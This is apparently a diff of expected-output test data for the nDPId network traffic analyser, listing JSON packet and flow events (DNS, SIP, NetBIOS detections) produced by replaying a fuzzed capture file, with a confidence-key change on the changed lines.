00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1120469572842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469572842,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CpoAR1vOq9KAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3RP"} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469572842,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469572842,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01073{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1120469572844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469572844,"pkt":"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"} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":200000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01097{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1120469572981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1120469572981,"pkt":"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"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":200000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572981,"flow_last_seen":1120469572981,"flow_idle_time":200000,"flow_min_l4_payload_len":486,"flow_max_l4_payload_len":486,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120469572981,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1120469573246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469573246,"pkt":"ADBUAGNWAODtAW69CABFAABIaZkAAIIRTbjAqAECwKgBAQqbADVANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAgAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469573246,"flow_last_seen":1120469573246,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469573246,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":32,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1120469574242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469574242,"pkt":"ADBUADRWAODtAW69CABFAABIaZoAAIARTbfAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469573246,"flow_last_seen":1120469574242,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469574242,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469576245} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":23,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469574242,"pkt":"ADCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1120469578248,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAABIaZwAAIARTbXAqAECwKgBAQqbADUANPFWONMBAAABAAAAAABJBF9zaXAEX3VkcANzaXAJY3liZXLyaXR5AmRrAAAhAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469578248,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cyber?ity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469582254} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469578248,"pkt":"ADBUADRWAODtAW69CABFAAB2aZ0AAIARTbTAqAECwKgBAQqbADUANPFWONMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5TWRrAAAhAAE="} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469589080,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469589080,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaZ4AAIARTK\/AqAECwKgB\/wCJAIkAOluxhOoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1120469590256,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469590256,"pkt":"ADBUADRWAODtAW69CABFAABEaaAAAIARTbXAqAECwKgBAQqcADUAMHpPqtMAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469590257,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1120469590257,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":65,"thread_ts_msec":1120469590257,"pkt":"AODtAW69ADBUADRWCABFAABVAABAAEARtz7AqAEBwKgBAiVzAJwAx1zLqtOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120469590259} 01249{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":722,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":722,"pkt_l4_len":0,"thread_ts_msec":1120469590257,"pkt":"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"} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00858{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1120469590405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1120469590405,"pkt":"AODtAW69ADBUADRWCABFAAFOAABAADcRit\/Q8iEjwKgBAhPEE8QBOln2U0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDQ2VxOiA2OSBSRUdJU1RFUg0KRnJvbTogPHNpcEZ2b2kxODA2M0DzaXAuY3liZXJjaXR5LmRrPjt0YWc9OGU5NDhiMA0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz4NClacYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLjIxOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAxNDk1MDUxNzhTNDM4YzUyOGIxOTIuMTY4LjEuMg0KQ29udGVudC1MZW5ndGg6IDANCg0K"} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1120469590455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":388,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":388,"pkt_l4_len":354,"thread_ts_msec":1120469590455,"pkt":"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"} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1120469595096,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120469595096,"pkt":"3\/\/\/\/\/\/\/AODtAW69CABFAADlaaMAAIARTBPAqAECwKgB+wCKAIoA0VtoEQ6E7MCoAQIAigC7AACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 